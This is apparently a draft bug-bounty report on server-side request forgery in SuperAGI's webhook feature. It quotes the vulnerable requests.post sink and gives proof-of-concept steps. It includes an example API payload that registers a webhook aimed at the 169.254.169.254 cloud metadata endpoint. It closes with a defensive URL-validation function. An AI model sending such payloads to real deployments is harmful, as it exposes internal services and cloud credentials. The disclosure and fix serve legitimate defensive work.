# SuperAGI — SSRF via user-configurable webhook URL without destination validation

STATUS: ALMOST_REPORT (needs investigation; do not submit)
readiness: NEEDS_INVESTIGATION
program: SuperAGI | platform: huntr | repo: TransformerOptimus/SuperAGI | commit: 2026-02-13-scan

````
Repository URL: https://github.com/TransformerOptimus/SuperAGI
Package Manager: pip
Version Affected: latest (observed in 2026-02-13 scan)
Vulnerability Type: Server-Side Request Forgery (SSRF)

CVSS:
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed
Confidentiality: High
Integrity: Low
Availability: Low

Title: Webhook feature allows server requests to attacker-chosen internal URLs

Impact: Attackers can probe internal network services, reach cloud metadata endpoints, and potentially exfiltrate sensitive infrastructure data depending on reachable targets.

Description:

# Description

SuperAGI allows users to register webhook URLs. On status events, backend code issues `requests.post()` to the configured URL without SSRF protections (no private-IP filtering, allowlist, or scheme restriction is visible at the sink).

Observed sink:

```python
request = requests.post(webhook_obj.url.strip(), data=json.dumps(webhook_obj_body), headers=webhook_obj.headers)
```

Webhook creation stores the user-provided URL and headers directly.

# Proof of Concept

1. Create a webhook via the API with the URL set to a collaborator server (for verification) or an internal target.
2. Trigger an event that dispatches webhook notifications.
3. Observe the incoming request from the SuperAGI server.
4. Repeat with an internal URL to confirm SSRF behavior.

Example payload:

```http
POST /api/webhooks/add
Content-Type: application/json

{
  "name": "ssrf-test",
  "url": "http://169.254.169.254/latest/meta-data/",
  "headers": {"X-Test": "1"},
  "filters": {"status": ["RUNNING"]}
}
```

Expected vulnerable behavior: the backend performs a server-side HTTP request to the attacker-supplied destination.
### Impact

Attackers can probe internal network services, reach cloud metadata endpoints, and potentially exfiltrate sensitive infrastructure data depending on reachable targets.

### Occurrences

```
Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/main/superagi/helper/webhook_manager.py#L28
Description: requests.post is called on user-configured webhook URL

Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/main/superagi/controllers/webhook.py#L64-L65
Description: webhook URL/headers are accepted from request and persisted
```

### References

```
URL: https://cwe.mitre.org/data/definitions/918.html
Name: CWE-918: Server-Side Request Forgery (SSRF)

URL: https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
Name: OWASP SSRF overview

URL: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
Name: OWASP SSRF Prevention Cheat Sheet
```
````
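A destination check that a fix at the `requests.post()` sink could apply before dispatch, added here as an example and not SuperAGI's own code: `validate_webhook_url`, `is_blocked_address` and the `FAKE_DNS` table are hypothetical names, and the resolver is injectable so the check runs offline. It rejects non-http(s) schemes, embedded credentials, and any literal or resolved address in loopback, private, link-local (the 169.254.169.254 metadata range used in the PoC), multicast or reserved space.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}

def is_blocked_address(ip):
    # Unwrap IPv4-mapped IPv6 (::ffff:10.0.0.1) so the IPv4 ranges apply to it too.
    ip = getattr(ip, "ipv4_mapped", None) or ip
    # Loopback, RFC 1918/ULA, link-local (incl. 169.254.169.254 metadata),
    # multicast, unspecified and reserved ranges are all rejected.
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def system_resolver(host):
    # Every address the hostname currently maps to, via the system resolver.
    return {ipaddress.ip_address(i[4][0]) for i in socket.getaddrinfo(host, None)}

def validate_webhook_url(url, resolver=system_resolver):
    """Return (ok, reason). Call at webhook creation AND again before each dispatch."""
    parsed = urlparse(url.strip())
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parsed.scheme!r}"
    if parsed.username or parsed.password:
        return False, "credentials embedded in URL"
    host = parsed.hostname
    if not host:
        return False, "missing host"
    try:                               # literal IP (IPv4, or IPv6 in brackets)
        addrs = {ipaddress.ip_address(host)}
    except ValueError:                 # hostname: check every resolved address
        try:
            addrs = resolver(host)
        except OSError as exc:         # socket.gaierror is a subclass of OSError
            return False, f"DNS resolution failed: {exc}"
    if not addrs:
        return False, "host resolved to no addresses"
    for ip in addrs:
        if is_blocked_address(ip):
            return False, f"destination {ip} is not a public address"
    return True, "ok"

# Constructed DNS table standing in for real resolution so the check runs offline.
FAKE_DNS = {"hooks.example.com": {ipaddress.ip_address("93.184.216.34")},
            "internal.corp": {ipaddress.ip_address("10.0.0.5")}}

def fake_resolver(host):
    if host not in FAKE_DNS:
        raise socket.gaierror(f"no such host: {host}")
    return FAKE_DNS[host]
```

Because the HTTP client resolves the name again at connect time, a validate-then-connect gap (DNS rebinding) remains; pass `allow_redirects=False` to `requests.post` and, ideally, pin the validated address at the transport layer rather than only checking beforehand.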